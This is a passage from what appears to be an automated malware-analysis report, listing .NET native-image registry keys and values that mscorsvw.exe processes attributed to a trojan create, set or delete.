[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "101"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\130e9a23\3c38ef63]
"65" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\3c38ef63\65]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
The process mscorsvw.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 98 70 A1 7E BB 69 3C 1B 55 55 85 A7 52 BE 55"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:1096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "10 5A 44 ED 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 0A D1 AE 63 B5 58 5D 67 29 C4 DD 5F EE 45 74"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
The process mscorsvw.exe:2816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 A4 AA 3B 25 4E 44 CC 7A 07 59 48 66 CB 8F 59"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"LastModTime" = "A6 E5 1D E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"MVID" = "AB 6E A2 EF 90 77 0C 78 07 DB 52 DB 59 B5 A1 32"
"Status" = "0"
"DisplayName" = "Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2995e574\9\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\19aba884\767c2dc2\68]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 C3 C5 07 94 F3 71 F2 91 EC B2 B9 E6 66 76 C7"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\19aba884\767c2dc2]
"68" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index62]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "98"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\1ee4ff02\69]
"SIG" = "07 95 68 2E 6D 23 41 45 81 DB 7F 93 51 3C 97 66"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
The process mscorsvw.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 7A EB 2D C3 48 40 B5 94 6E 13 D3 7F 49 4E 50"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "38 98 01 ED 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
The process mscorsvw.exe:2728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "40 93 6C E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F E5 08 E5 77 DF D7 A8 7D 99 5B 45 2D DA C1 17"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "EE DF 99 E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
The process mscorsvw.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E ED CB 30 19 32 99 5E 06 A6 96 4B 24 24 02 23"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "E8 67 C2 E8 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "64 63 79 E7 3A 47 D1 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "38 8A C2 5A CA 17 BF F8 01 17 D6 DB 79 93 7A 69"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"
